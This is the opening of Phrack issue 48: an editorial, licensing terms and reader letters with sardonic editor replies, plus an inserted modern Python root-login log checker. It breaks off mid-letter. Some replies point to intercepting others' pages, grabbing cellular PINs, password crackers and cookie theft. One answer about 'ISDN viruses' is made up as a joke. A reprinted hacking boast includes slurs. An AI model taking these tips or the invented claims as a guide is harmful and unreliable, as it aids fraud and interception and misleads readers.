~ WARNING! This is a TOP SECRET-MAGIC EYES ONLY document containing 
compartmentalized information essential to the national security of the 
United States. EYES ONLY ACCESS to the material herein is strictly 
limited to personnel possessing MAGIC-12 CLEARANCE LEVEL. Examination 
or use by unauthorized personnel is strictly forbidden and is punishable 
by federal law. ~ 


Yes, it's the annual issue of Phrack you've all been waiting for, 
hopefully you have kept your security clearances current. The delay has 
been a long one, much longer than anyone would have liked. Obviously 
Phrack was never meant to be put out so infrequently, but the 
continual pressures of daily life have taken their toll on yet 
another editor. Yes, those little things like going to work, paying 
the rent and all the other hassles that interfere with putting out a 
large quarterly hobbyist publication. 


It finally came down to three choices: keep the status quo and put out an 
issue whenever, charge per issue, or get in some new blood. Obviously the 
status quo sucked, and an issue a year was just unacceptable. Charging 
everyone was even more unacceptable, even though "Information wants to 
be $4.95." So, that left bringing in more people to help. 


The hard thing was finding people worth bringing into the fold. 
There was never any shortage of people who wanted to take over the 
whole magazine, but it wasn't until three of them banded together and 
volunteered to take over the main editorial nightmare that it looked 
like there was a light at the end of the tunnel. Voyager, maintainer of 
the #hack FAQ and editor of CoTNO, ReDragon, editor of FeH and 
continual discoverer of Linux root bugs, and Daemon9, admin of InfoNexus and 
text file author extraordinaire, came forward en masse and said, 
"We'll do it." 


Most of you have no idea how hard it is to put out a magazine like Phrack 
with any degree of regularity. You have to track down articles, answer 
tons of mail, read all kinds of news, edit the articles (most of which 
were written with English as a second language), maintain the mailing 
list, maintain the WWW site, etc. Hopefully with all the new 
people involved, the new division of labor will allow everyone to 
contribute and put out a magazine in a very timely fashion. (And allow poor 
old Erikb to rest easy knowing the magazine is being taken care of so 
he can devote more time to being a puppet-like stooge of The Man.) 


In any case, you've waited long enough... here's Issue 48. 


READ THE FOLLOWING 


IMPORTANT REGISTRATION INFORMATION 


Corporate/Institutional/Government: If you are a business, 
institution or government agency, or otherwise employed by, 
contracted to or providing any consultation relating to computers, 
telecommunications or security of any kind to such an entity, this 
information pertains to you. 

You are instructed to read this agreement and comply with its 
terms and immediately destroy any copies of this publication 
existing in your possession (electronic or otherwise) until 
such a time as you have fulfilled your registration requirements. 
A form to request registration agreements is provided 
at the end of this file. Cost is $100.00 US per user for 
subscription registration. Cost of multi-user licenses will be 
negotiated on a site-by-site basis. 


Individual User: If you are an individual end user whose use 
is not on behalf of a business, organization or government 
agency, you may read and possess copies of Phrack Magazine 
free of charge. You may also distribute this magazine freely 
to any other such hobbyist or computer service provided for 
similar hobbyists. If you are unsure of your qualifications 
as an individual user, please contact us as we do not wish to 
withhold Phrack from anyone whose occupations are not in conflict 
with our readership. 


Phrack Magazine corporate/institutional/government agreement 


Notice to users ("Company"): READ THE FOLLOWING LEGAL 
AGREEMENT. Company's use and/or possession of this Magazine is 
conditioned upon compliance by Company with the terms of this 
agreement. Any continued use or possession of this Magazine is 
conditioned upon payment by Company of the negotiated fee 
specified in a letter of confirmation from Phrack Magazine. 


This magazine may not be distributed by Company to any 
outside corporation, organization or government agency. This 
agreement authorizes Company to use and possess the number of copies 
described in the confirmation letter from Phrack Magazine and for which 
Company has paid Phrack Magazine the negotiated agreement fee. If 
the confirmation letter from Phrack Magazine indicates that Company’s 
agreement is "Corporate-Wide", this agreement will be deemed to cover 
copies duplicated and distributed by Company for use by any additional 
employees of Company during the Term, at no additional charge. This 
agreement will remain in effect for one year from the date of the 
confirmation letter from Phrack Magazine authorizing such continued use 
or such other period as is stated in the confirmation letter (the "Term"). 
If Company does not obtain a confirmation letter and pay the applicable 
agreement fee, Company is in violation of applicable US Copyright laws. 


This Magazine is protected by United States copyright laws and 
international treaty provisions. Company acknowledges that no title to 
the intellectual property in the Magazine is transferred to Company. 
Company further acknowledges that full ownership rights to the Magazine 
will remain the exclusive property of Phrack Magazine and Company will 
not acquire any rights to the Magazine except as expressly set 
forth in this agreement. Company agrees that any copies of the 
Magazine made by Company will contain the same proprietary 
notices which appear in this document. 


In the event of invalidity of any provision of this agreement, 
the parties agree that such invalidity shall not affect the validity 
of the remaining portions of this agreement. 


In no event shall Phrack Magazine be liable for consequential, incidental 
or indirect damages of any kind arising out of the delivery, performance or 
use of the information contained within the copy of this magazine, even 
if Phrack Magazine has been advised of the possibility of such damages. 
In no event will Phrack Magazine's liability for any claim, whether in 
contract, tort, or any other theory of liability, exceed the agreement fee 
paid by Company. 
This Agreement will be governed by the laws of the State of Texas 
as they are applied to agreements to be entered into and to be performed 
entirely within Texas. The United Nations Convention on Contracts for 
International Sale of Goods is specifically disclaimed. 


This Agreement together with any Phrack Magazine 
confirmation letter constitute the entire agreement between 
Company and Phrack Magazine which supersedes any prior agreement, 
including any prior agreement from Phrack Magazine, or understanding, 
whether written or oral, relating to the subject matter of this 
Agreement. The terms and conditions of this Agreement shall 
apply to all orders submitted to Phrack Magazine and shall supersede any 
different or additional terms on purchase orders from Company. 


REGISTRATION INFORMATION REQUEST FORM 


We have approximately ______ users. 

Enclosed is $________ 

We desire Phrack Magazine distributed by (Choose one): 

    Electronic Mail: ______ 
    Diskette: ______ (Include size & computer format) 

Company: 
Name:                          Dept: 
Address: 
City/State/Province: 
Country/Postal Code: 
Telephone:                     Fax: 


Send to: 

    Phrack Magazine 
    603 W. 13th #1A-278 
    Austin, TX 78701 


Enjoy the magazine. It is for and by the hacking community. Period. 


Editors                  : Voyager, ReDragon, Daemon9 
Mailboy                  : Erik Bloodaxe 
3L33t                    : Mudge (See Below) 
Short                    : Security Dynamics (NSDQ:SDTI) (See Above) 
Myers-Briggs             : ENTJ 
News                     : Datastream Cowboy 
Prison Consultants       : Co / Dec, Tcon 
Sick Sexy Horror Chick   : Poppy Z. Brite 


Thanks To                : Cherokee, Damien Thorn, Boss Hogg, StaTiC, 
                           Sendai, Steve Fleming, The Guild, 
                           Obi-1, Kwoody, Leper Messiah, Ace, 
                           SevenUp, Logik Bomb, Wile Coyote 
Special Thanks To        : Everyone for being patient 

with the following key : (Not that we use PGP or encourage its 
use or anything. Heavens no. That would be politically-incorrect. 
Maybe someone else is decrypting our mail for us on another machine 
that isn't used for Phrack publication. Yeah, that's it. >) ) 


** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** 


Phrack goes out plaintext... you certainly can subscribe in plaintext. 


-----BEGIN PGP PUBLIC KEY BLOCK----- 


"The culture of criminal hackers seems to glorify behavior which would be 
classified as sociopathic or frankly psychotic." 
(Mich Kabay, director of education, NCSA, NCSA News, June 1996) 


"The Greek word 'diarrhein,' which means 'to flow through,' describes 
diarrhea very well." 
(Gross-ology by Sylvia Branzei, Planet Dexter, 1996) 


"Fuck you, clown!" 
(Thee Joker, Defcon IV, July 28, 1996) 
==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 2 of 18 


Phrack Loopback 


This is a response to the letter from KoV included in "Line Noise 
Part I" from Phrack #47. After reading this open letter, I nearly died of 
laughter. The inaccuracies of KoV’s story were numerous and comical. 
However, from the way KoV presented themselves, they are acting as if 
it was their BBS network and a government conspiracy that has gotten 
them into trouble. As a result, they will appear to many as a 
wrongfully persecuted group of computer users. 


Apparently, KoV likes to fancy themselves as a group that 
spread "open-minded" and "sociopolitical" beliefs through their BBS 
network, KoVNet. They claim that they "questioned [the] authority" of 
those who "tried to oppress [their] free-thinking minds." They then 
state that this caused the "AmerikKKan" government to monitor their 
actions, "stalk [them] in public places", and attempt to destroy 
them "from the moment of KoV's conception." 


This is ridiculous. First off, their BBS network was not 
enough to cause the government to stalk them in public. If a BBS 
network that contains disdain for the American government justifies 
the stalking of its users, then NUMEROUS people in this country are 
currently being followed in public. Therefore, KoV's claim about 
their threatening BBS network is an attempt to make 
themselves look bigger and more important than they were. 


Now, let us look at the real reason they are facing legal 
actions. KoV is blaming "false accusations from a local university" 
for their troubles. However, the accusations are not false and 
after you read what led them to be caught, you will realize that KoV 
was never a threat to the government. 


I do not know exactly how many universities they hacked. 
However, if it is one local university as they claim, it is Skidmore 
in Saratoga Springs NY, the university which I attend. I myself have played 
around with Skidmore's computers and do not feel any loyalty or 
patriotism to my school. Therefore, it is not a grudge I am harboring 
against KoV for hacking Skidmore's system that is causing me to write 
this. It is merely the fact that KoV is distorting the truth in an 
attempt to turn themselves into martyrs. 


Personally, I cannot blame anyone for breaking into Skidmore’s 
system. Since Skidmore was relatively new to the Internet, their 
security was very lax making it very easy to explore and play around 
with the system. If KoV had any knowledge whatsoever, they would not have 
been caught or even detected by Skidmore. It was their egos and lack 
of knowledge that led to their investigation. I myself saw with my 
own eyes how they were detected. 


The system that was hacked by KoV was wopr.skidmore.edu. 
Well, one day I took a look at the system logs for WOPR and saw "root 
login from [some out of domain ip address]" standing out quite well. 
If KoV was really so knowledgeable and dangerous, wouldn't they know how to 
edit system logs? However, they did not, which shows KoV is another 
example of people who managed to obtain root access and did not know 
what to do with it. 


Some people would think, "Big deal! Just because they didn't 
edit the system logs does not mean that they could ever be linked to 
the crime." This is very true. However, this would have required KoV 
to keep their mouths shut about the incident. Yet, they did not. 
Apparently, Lord Valgamon made a post to some of the BBS networks he 
frequented where he showed off about hacking Skidmore and told 
everyone how he did it. 


This hurt KoV greatly. As a result, a narc on the BBS network 
alerted CERT about Lord Valgamon’s claims who, in turn, reported the 
incident to Skidmore. This caused Skidmore to now have a name, though 
anonymous, to apply to the break in. Consequently, the proper 
authorities became involved and they began to track down Lord Valgamon 
on the BBS networks. 


From the above facts, you can probably guess that the 
"AmerikKKan" government would never have a special interest in KoV 
because they are the typical stereotype of an "ELiTE MODeM d00d." If 
Lord Valgamon and KoV had kept their mouths shut about the incident, 
they never would have been caught. However, KoV needed to tell their 
ELITE BBS scene how bad-ass they were and, as a result, their 
bad-asses are getting spanked hard. 


KoV had not done any crime or brought up any controversy 
against the government. Their only crime was that they were stupid. 
I understand that KoV is now asking for the support of the h/p and 
political groups in the scene. However, I would not recommend anyone 
to give them support. There was no government conspiracy against KoV 
and everything that has happened to them was brought on by their own 
stupidity. Do not turn a bunch of egotistical and immature criminals 
into martyrs. I will end this with the same words KoV started their 
letter with: "Don't believe the hype." Public Enemy. 

Sincerely, 


Mr. Sandman 


[ Wow. Well, we always like to hear all sides to any story, and each 
time something gets published that gets under someone else's skin, we 
inevitably do. Thanks for writing! ] 
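The letter above turns on one detection: a root login from an address outside the school's own network sitting unedited in the system logs. The following is an added example (written for this edited page, not code from the letter writer, from Skidmore or from Phrack) of the same check done mechanically: scan login records for root logins, ignore console logins, and flag any whose source address is not in a trusted netblock. The log lines and the trusted range (TEST-NET-1, 192.0.2.0/24) are constructed for the example; the host name wopr is taken from the letter, and the record format is an assumption modelled on old BSD login messages, not a documented Skidmore format.

```python
import ipaddress
import re
from typing import Dict, List

# Netblocks the institution legitimately uses. Assumption: a constructed
# documentation range, not any real allocation.
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]

# Constructed sample syslog lines in the style of a 1990s BSD login daemon.
# Line 2 is the one the letter writer describes: root from a foreign address.
SAMPLE_LOG = """\
Jul 29 01:12:03 wopr login: ROOT LOGIN ON ttyp1 FROM 192.0.2.17
Jul 29 02:45:51 wopr login: ROOT LOGIN ON ttyp2 FROM 203.0.113.44
Jul 29 03:01:10 wopr login: LOGIN ON ttyp3 BY alice FROM 198.51.100.9
Jul 29 03:20:22 wopr login: ROOT LOGIN ON console
Jul 29 04:00:00 wopr login: ROOT LOGIN ON ttyp4 FROM 192.0.2.200
"""

# Parse: timestamp, host, ROOT LOGIN or plain LOGIN, tty, optional user,
# optional source address. Console logins have no FROM clause.
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]+)\s+(?P<host>\S+)\s+login:\s+"
    r"(?P<who>ROOT LOGIN|LOGIN)\s+ON\s+(?P<tty>\S+)"
    r"(?:\s+BY\s+(?P<user>\S+))?"
    r"(?:\s+FROM\s+(?P<src>\S+))?\s*$"
)


def is_trusted(addr: str) -> bool:
    """True if addr parses as an IP and falls inside a trusted netblock.
    Anything unparseable (a hostname, garbage) is treated as untrusted."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_NETS)


def suspicious_root_logins(log_text: str) -> List[Dict[str, str]]:
    """Return root logins that came from a remote address outside TRUSTED_NETS.
    Console logins (no FROM clause) and non-root logins are skipped."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if not m or m["who"] != "ROOT LOGIN":
            continue
        src = m["src"]
        if src is None:          # local console, nothing remote to judge
            continue
        if not is_trusted(src):
            hits.append({"ts": m["ts"], "host": m["host"],
                         "tty": m["tty"], "src": src})
    return hits


if __name__ == "__main__":
    for h in suspicious_root_logins(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']}: root login on {h['tty']} from {h['src']}")
```

Run stand-alone it prints the single foreign root login. The point the letter makes still applies to the check: it only works while the log is intact, so on any box where root can be reached remotely the records should also be shipped to a host the intruder does not control.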


Hello! 


Let me tell you some words about myself. Computers and 
telecommunications take quite an important place in my life. In the 
past I worked as a programmer, a system administrator and finally 
I ran my own business selling computer hardware (now I have 
closed this business because I have lost my interest in trade 
and due to some financial reasons). I owned my own BBS for 
several years but now I have shut it down because I do not want to 
support lamers leeching files 2-3 years old and having no idea 
what email is. Now almost every day I spend many hours reading 
Internet newsgroups, mainly dedicated to phreaking/hacking. 


A friend of mine gave me some Phrack issues (the newest was #42 of 1993). 
I have read them and like them very much. 


If it is possible, please drop me a line on how I could subscribe 
to Phrack magazine. If you do, please encrypt your reply and 
send it via an anonymous remailer, because now the Russian government 
has begun to control email messages very thoroughly. 


I have private information from a friend at an Internet provider about 
the FAPSI (Federal Agency of Government Communications and 
Information -- some form of Russian NSA/FCC hybrid formed from 
ex-KGB agents) actions aimed to control data passed through 
Internet channels in Russia. FAPSI ordered all Internet 
providers in St. Petersburg to install software whose task will 
be to copy all messages addressed to/from persons which FAPSI is 
interested in and to scan for some keywords specified by FAPSI. 
Providers will get their licences for providing communication 
service only after installing such spy software. There is a 
rumour that FAPSI has installed hidden microphones (bugs) in 
providers' offices to control any "illegal" activity (free 
information exchange always was illegal in the USSR/Russia). I say 
"rumour" because I have heard it only from one trusted source; the 
other information came from several trusted sources 
simultaneously. 


BTW, using PGP is illegal in Russia too, because FAPSI can not 
break the PGP-encrypted messages. 


If you find the information written above meaningful, you may use it 
at your own discretion but with some precautions -- remember 
that the country I live in has barbaric laws and the Russian 
Police/Security Services have _absolute_ power to put in jail 
anyone they want without any court or warrant. 


[ Normally I strip out all anonymous remailers, because they 
interfere with the bulk mailing process, bounce mail, and generally 
screw things up... however, there are always exceptions. 


The FAPSI requirements are extremely interesting to hear about. It 
certainly makes sense, and I fear that our country is likewise heading 
towards that goal. 


If you get the chance, you ought to write more about being a hacker 
in your country, since I am sure the rest of the world would be 
fascinated by it. ] 


Greetings... 
I'm looking for just a nibble of information... 


When one logs into a remote system and gets login and password questions, 
how does one write a program to crack a password... 


I’m sure that is not an easy question or even a nibble perhaps a byte... 


Seeking Info, 
SPY 


[ Well, I can't tell you how to write a program to crack passwords 
without knowing what kind of system you want to crack passwords for. 


I can't tell you how to say "Where is the bathroom" in a foreign 
language without first knowing what language you want to say it in. 


If you are talking about UNIX passwords, there are already numerous 
programs written to "crack" passwords. I would suggest you go poke around 
and look for programs like "crack" or "killer cracker." If you 
can't find reference to either of these on the net, then you really 
ought to consider finding a new hobby. ] 


Wuzup! I have a pager that I don't use anymore because I can't afford the 
bill. So I was wondering if there is any way I can hook up my pager for free 
without going through a paging service. 


[ Depending upon the pager, you can possibly change or add capcodes through 
special programming software. Almost all Motorola pagers allow you to do 
this. 


This won't allow you to "really" get free service, but you can piggyback 
on top of some known person's pager service (or just intercept their pages.) 

The only way to get "free" service is to reactivate the pager's current 
capcode in the paging system from the local provider who owns the frequency 
the pager is crystaled for. ] 


I was browsing through Issue 47, and saw something that had caught 
my eye. 


"THE HACKER WAR -- LOD vs MOD" 

This t-shirt chronicles the infamous "Hacker War" between rival 
groups The Legion of Doom and The Masters of Destruction. The front 
of the shirt displays a flight map of the various battle-sites 
hit by MOD and tracked by LOD. The back of the shirt 
has a detailed timeline of the key dates in the conflict, and 
a rather ironic quote from an MOD member." 


A few weeks ago, I read the book Masters of Deception, a book about 
the "war". Wasn't the name of the rival group Masters of Deception? 
I assume that Erik would know; he appeared to be the main "villain" in 
this version of the story. Any response would be appreciated. 


[ I was the villain? Well corn my pone. 


In any case, you should always take everything you read with a grain of 
salt. In my opinion, the book was a piece of shit. Since many of the 
MOD members decided to viciously attack the author, Josh Quittner, posing 
as the ILF, I can only assume that they felt likewise. 


So you decide for yourself about all that. Oh, and buy the damn 
t-shirt. http://www.fc.net/phrack/shirts.html ] 


Hi, can you teach me to be a hacker? I think that that would be cool. So what do 
you think, can you teach me to be a hacker and to be cool? You are one of the 
biggest hackers in the world. 


[ No, I’m afraid as one of the biggest hackers in the world, I’m far too 
important to expend any energy on the likes of you. 


Now go back to your PlayStation and get better at Toshinden. ] 


Where could I find some zipped red box tones? Or blue box. 
CyberOptik 


[ Make your own tones with the Blue Beep program. 


Follow some of the links from the Phrack Home page, and you should 
find this program on any number of sites. ] 


Hallo, din Gamle Ørn!! 
(Norwegian for: Hello, you Old Eagle!! 
(Ørn (Eagle) is pronounced like: earn) 
(direct translation.) 
End of Norw. lesson. 


This is a question from one viking to another; I am a newbie in the H/P 
division so I spend my days (and nights!) downloading all I can find about the 
subject. But I do have some problems with the cellular phone system over 
here, NMT 900. Which your system AMPS has stolen all the good parts from! 
Until last year I could program my cellular phone, an Ericsson NH 99, by 
programming and switching the 27c512 PROM. But now the Norwegian 
telecompany Telenor Mobil has inserted PIN codes, i.e. if my cellular phone 
number used to be 12 34 56 78 (we have 8 digits), then my phone number now 
has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the 
owner of the phone. 


I do have programs and cables for programming the phone with all 8+3 digits, 
but then I have to know the 3 digits, the PIN code, and I do NOT know how 
to download them from the cellular traffic going around my place. Can you 
help me beat the system? How do I download the PIN code???? I read that they 
are going to use the same system in the N.Y. area within this year, so someone 
is going to ask you these questions sooner or later. Be prepared! Or is my question 
old news? Maybe everyone knows how to do this? Except the Norwegian newbie.... 


Vennlig hilsen 
(that's: Best regards) 


Stian (Mr. Phonee) Engerud 


[ I'm not sure I understand how the last 3 digits can be unknown to the 
owner of the phone. If your number changes, then obviously you have to 
know the new number. Are you sure this isn't just a touch-tone PIN 
entered in when you use the phone, like systems over here in the States? 


If it is, then you'll still need some kind of ESN reader, or other means 
to decode the reverse channel, and a 900 MHz-capable radio and a touch-tone 
decoder to grab the PINs as well. It's incredibly annoying. 


On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems 
in place. Have they upgraded their ETACS systems as well? If not, 
use those. ] 


From: zadox@mindspring.com (Ron Zalkind) 
Subject: Phrack Magazine: Strategic Marketing Partnership 


I’m one of the principals of a new Internet-based, second-generation, 
Information Technology service. This new Internet service debuted last week 
at the Culpepper Forum in Atlanta. I’d like to propose a strategic marketing 
partnership with Phrack Magazine. This proposal will spell out what it is 
our service does (including a product demo), how we think a partnership with 
Phrack Magazine might work, and how we can all increase profits by doing so. 
Please reply to this E-mail with the name and E-mail address of the 
‘director of online strategy’, or the ’circulation director’, for Phrack 
Magazine. Thank you. 


Ron Zalkind, President 
R.E. Zalkind & Co. Inc. 
Voice: 770-518-1600 
Fax: 770-642-0802 
E-mail: zadox@mindspring.com (Ron Zalkind) 


[ WOW! I can't wait to hook up with THESE incredibly savvy people 
so Phrack can dramatically increase our profits. Let's see, if we 
make any money, we'll see a 100% increase! It's a no-lose 
situation. 


Man, I hate Internet mass-mailers. Don’t these people attempt to qualify 
their leads even a LITTLE? Strategic Marketing Opportunities with 
free computer hacker magazines? Ron? Hello? ] 
First of all, great work on the 'zine all these years, hope to see 48 
soon. 


I have an article from "Airman" magazine (I believe it was the April 
1996 issue), the US Air Force magazine given to military members. It 
details the efforts of AFOSI (Air Force Office of Special Investigations) 
to prevent hackers from breaking in to military computers. Considering 
it's coming from the military, it's not too badly written (the author 
actually knew the difference between "crackers" and "hackers"). I don't 
have a scanner, but I'd be more than willing to snail mail it to you. I 
just wanted to check and see if you guys already had it or not. If you 
don't, let me know, and I'll get it to you ASAP. 


Keep up the good work.... 


[ We would definitely like to see the text from this article. Please 
forward it! 


In fact, if any of you readers ever come across ANYTHING you think is cool, 
email it to us, or snail mail it. We love getting mail. 
We will print anything cool. (And a lot of lame things too!) 


Just stop sending us credit histories and password files. ] 


need access to w.gov XXX now 


[ w.gov? Uh, ok, let's see: 

    Reserved Domain (W-GOV-DOM) 
    Domain Name: W.GOV 

    Administrative Contact, Technical Contact, Zone Contact: 
       Internet Assigned Numbers Authority (IANA) iana@isi.edu 
       (310) 822-1511 

    Record last updated on 02-Dec-93. 
    Record created on 01-Dec-93. 

Do you know what this means? Duh. ] 


From: health@moneyworld.com 
Subject: Scientific Discoveries Minimize Aging (DHEA) 


http://dhea.natureplus.com 


Take advantage of the amazing benefits of DHEA. In the search for the 
FOUNTAIN OF YOUTH, DHEA is a must READ ME. People, age 70, feeling and 
acting 25. 


Read the medical research at http://dhea.natureplus.com . A quote from 
an article published by the New York Academy of Science written by Dr. 
S.S.C. YEN: 
"DHEA in appropriate replacement doses appears to have remedial effects 
with respect to its ability to induce an anabolic growth factor, increase 
muscle strength and lean body mass, activate immune function, and enhance 
quality of life in aging men and women, with no significant adverse effects." 


Regain the eye of the tiger! Don’t wait ! Click on: http://dhea.natureplus.com 


To terminate from the Health Catalog, Reply to health@moneyworld.com with 
"remove" in the subject field. Bob Williams 206-269-0846 

P.S. You will find a full line of Vitamin, Supplements and OTC Health 
Catalog at http://natureplus.com. 


[ Yet another mass mailing! How many lame mailing lists are we on? 
You have to wonder about these things. 


But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH! 
I need to get me some of that. A little DHEA, a little GHB, a little 
DMT, and you'll look younger, feel younger, and have the brain of 
a two year old. 


And besides, Jesus loves acronyms. ] 


Do you listen to 2nur radio? If so have you ever heard a band named 
SOYLENT GREEN or GOITER on any of their shows? 

please email me back 

thanx, 

Nick 


[ Nick, I hate to break it to you, but: 


SOYLENT GREEN IS PEOPLE!!! 
IT'S PEOPLE!!!! ] 


From: Pete Shipley <shipley@dis.org> 
To: best-of-security@suburbia.org, cert@cert.org, cudigest@sun.soci.niu.edu, 
    daddict@1l5.com, dc-stuff@fc.net, dtangent@defcon.org, 
    emmanuel@2600.com, grayarea@gti.gti.net, letters@2600.com, 
    mycroft@fish.com, phrack@freeside.fc.net, phrack@well.sf.ca.us, 
    proff@suburbia.org, root@iss.net, root@l0pht.com, root@lod.com, 
    root@newhackcity.com, spaf@cs.purdue.edu, strat@uu.net, 
    will@command.com.inter.net, zen@fish.com 
Subject: Shipley owned, hacked and thrashed 


Please distribute this letter freely: 


This posting is being made from dis.org, and this is not forged e-mail. 
Even though this mail is coming from Peter Shipley's account, I am not him. 


Who am I? 


That is unimportant except to say that I cannot take any more of the 
"DoC" crowd's BULLSHIT. I would like to raise an issue with them, mostly 
(but not all) related to the incident at defcon. 


To you drunken losers at defcon who had to fuck with Netta's speech (DoC 
on hold here for a second, it wasn't just them): If you didn't want to hear 
Netta's speech (though in your opinion it may be monotone, boring or even 
wrong) you DIDN'T HAVE TO STAY AND LISTEN TO IT. There were some people that 
WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST 
ASSES. How different are you now from a government that would like to 
enforce censorship upon its own people? 


All I can say is "getbacks are a bitch". A few things to consider: 


1. Shipley is an utter tool. His whole appearance is a front. If he's 
such an awesome security specialist then why was he so easily owned? Also 
I bring into question some of the motives he has for harassing Netta Gilboa. 
Her boyfriend (who is currently in jail) was known for continually hacking 
(yes CONTINUALLY hacking) Peter Shipley. I know this because I spoke with 
Chris (n00gz) many times and was aware of this fact. 


In my opinion Petey, anyone that is foolish enough to hire you to secure their 
systems are idiots; whether it's the military, government, industry, a 
business -- they should all just ask for their money back. You are a discredit 
to your profession. 


2. Shipley is a coward. Only cowards attack people weaker than them 
but back away from a confrontation with someone of equal size or power. 
Careful Peter, next time don't piss off Bootleg, he might hurt that pretty 
boy face of yours (though I admit, I would like to see it). 


3. Hackman was a gob of shit. Peter Shipley has come to know his true 
calling in life now (to wit: Webmaster). 


4. The fangs make you look like a homo. Maybe you are (nothing against 
them actually, just stating a fact). 


Shipley, seven, (ayoung, where's your piglet account?). Get a fucking life. 
Maybe instead of constantly going around "Searching for intelligent life" 
perhaps you should stay home and secure your own systems. You are all owned, 
now don't you feel stupid? You should. You are. 


DIS.ORG == DISORGANIZED. 


-- galf@upt 


[ This is almost funny. 
Notice I said, almost. 


You have to admit though, Shipley always comes with some damn fine 
women in tow. Oh the things I did in my mind to that blonde... 


Something tells me that the author of this forged message could use a lot 
of Shipley hand-me-downs: Women, contracts, references, etc... ] 


Hey, I just watched the movie Hackers, and I was just curious to know if they 
used you and the LOD to model the characters in the movie after? A lot of the 
handles and choice phrases they used sounded awfully familiar with what 
went on, or at least what the book said went on. 


Meds: } 


[ Actually, meds, the screenwriter hung around with "MOD" and other people from 
the New York hack scene and picked up some pointers, and then used 
people like Dead Lord and Emmanuel Goldstein as technical assistants. 


Or something like that. 


Please, don’t ever associate "LOD" with this piece of shit again. :) ] 


A lot of people have read the article about Joe Engressia and his time in 
Memphis where he was arrested by the police and banned from his dream of 
working on phone lines. Well, at the time when he was living on Union 
Avenue, my mother was in charge of payroll, hiring and the like at a local 
switchboard. This was back in 1972 when the phone system was less of the 
fuqup it is today. Well, a friend of my mother's taught Mr. Engressia how to 
cook and other related household things despite his handicap. Shortly after 
or before this, (I am unsure) he was arrested by the police. I think this 
was also about the time the interview was made. Anyway, the local phone 
companies would not touch him, not even to give him service. My mother, 
after talking with him, decided to hire him as a phone consultant. (Her 
opinion of him was that "He was so brilliant, it was scary, I mean REALLY 
scary.") She thought he was a great "kid" (22 at the time) and was the best 
consultant that they had. He worked there for three years before moving. 
The last my mother heard was that he was living in a Denver high rise 
working as a consultant to a corporation or something out there. I only just 
started talking with my parents about this today, but I am sure that they 
will tell me more of him. 


Oh, and my father was good friends of Joe too, he and Joe were Ham Radio 
operators here in Memphis and my father still phreaks on them so I am sure 
that Mr. Engressia does too. Anyway, my father is teaching me how to hack, 
and my mother is teaching me how to phreak, but she only knows a little of 
outdated info and wants to get in touch with Joe. If anyone, ANYONE has any 
information about Joe, or if somehow this article gets to Joe, please let me
know at the following e-mail address: 

Kormed@aol.com. 


[ We used to call Joe on conferences a long time ago. I could probably 
dig his contact information up, but I really doubt he’d appreciate his 
number being published in Phrack. 


Hell, if your parents are teaching you how to hack & phreak, then certainly 
they can find Joe. He was always listed in Directory Assistance when 
we tracked him down years back. 


Have you even really looked for him?  ] 


quick question For Bloodaxe. 

Ok, I know you probably get this Alot,but I just have to ask?... 

Did you Really Date Christina Applegate? 

had to ask, 

[ Man, now that is a rumor that I would love to have started myself. 
No. Never dated her, never met her, never talked to her, never 


had any contact whatsoever. Spent some time holding up some of her 
posters with one hand, but that’s about it. ] 


do you have any info on stealing magic cookies ?? 


[ No, but I can trade you these magic beans for your cow. If you plant 
them they will grow high into the sky, towards the castle in the clouds 
where the giant lives with the talking harp and the goose that lays the 
golden eggs. 


Go read some of the WWW Security Lists, if you're talking about what
I think you are. There are also javascript routines that collect
navigator cookies from clients hitting your page. After briefly looking
around, I can't find the specific sites to snarf them from. Go do a
webcrawler search for WWW security or javascript security. ]


Dear Phracks - I'm a Free Journalist from Germany and I'm going to write
an article about ISDN and the possible danger which might happen to a
company etc. getting hacked by some agents, spies etc. from other
countries. So I'm looking for infos about ISDN-Viruses, Hackers and
background infos.


Can you help me? 
[ Wow, a "Free Journalist." I thought that pesky national socialist party
imprisoned all you guys.


ISDN Viruses are quite possibly the worst thing to happen to computing
since the creation of the Cellular Trojan Horse. Basically, these viruses
travel over the wires using the X.224 transport protocol, and seize the
D channel using Q.931. All SS7 data sent over the D channel is quickly
compromised and re-routed to different signal transfer points, causing
massive ANI Failure over the entire routing mesh.


Rumor has it that the Internet Liberation Front was behind these viruses 
with heavy investment coming from the German Bundesnachrichtendienst's
Project Rahab. These hackers were paid with AT&T calling cards encoded 
with a polymorphic encryption scheme, and cocaine. 


You can quote me on this. ] 


Well, i wanna make an offer, and a nice deal. 

i am an editor in an H/P/C magazine of HFA (universal H/P/C
GROUP :)

well, what i wanna offer is a joining both of the papers 
2gether, OR! u want more subscribes, we’ll publish ya, 

but adding 1 article from ya’r paper, saying from where it is. 
so, if we can make this deal, contact me asap! 

10x. 


[ Let me see if I understand this, your "universal H/P/C group" has
a magazine, and wants to do "Phrack" the great honor of merging
with us, or printing our articles? Wow. What a deal. You mean
by linking up with you guys, we will hit a greater audience
"universally?"


So, merging our roughly 10,000 direct email subscribers, and a roughly 
75,000 more WWW or misc. readers, adding in your readers, that should 
bring us up to 85,001 readers! Universally! FAN-FUCKING-TASTIC! 


Are there so many rocks for you people to crawl out from under? 
Sheesh! ] 


Hello, 
I have a need for a network sniffer. Specifically, one that will 
sniff IEEE-802.3 packets and TCP/IP packets. Any leads? 


[ Well, gee, are there network sniffers that won’t? 


Go do an archie search for tcpdump. ] 


I was just strolling by you page: http://freeside.com/phrack.html, 
and found my link "Showgirl Video" (link to vegaslive.com). 


I am the creator and webmaster for the site. If I can ever be 
of assistance to you let me know. 


We are one of the few sites in the world that has a live stage and 
live 1 on 1 conferencing in one place. 


JOAN


[ Ya know, every time I’m in Vegas I make it out to Showgirl Video with 
a bucket of quarters and a healthy dose of bad intent. I have to 
congratulate you guys for going on-line. I love it when two of 
my favorite things come together (smut and computers). 


Unfortunately, The Vegaslive site is kind of pricey. You guys seriously 
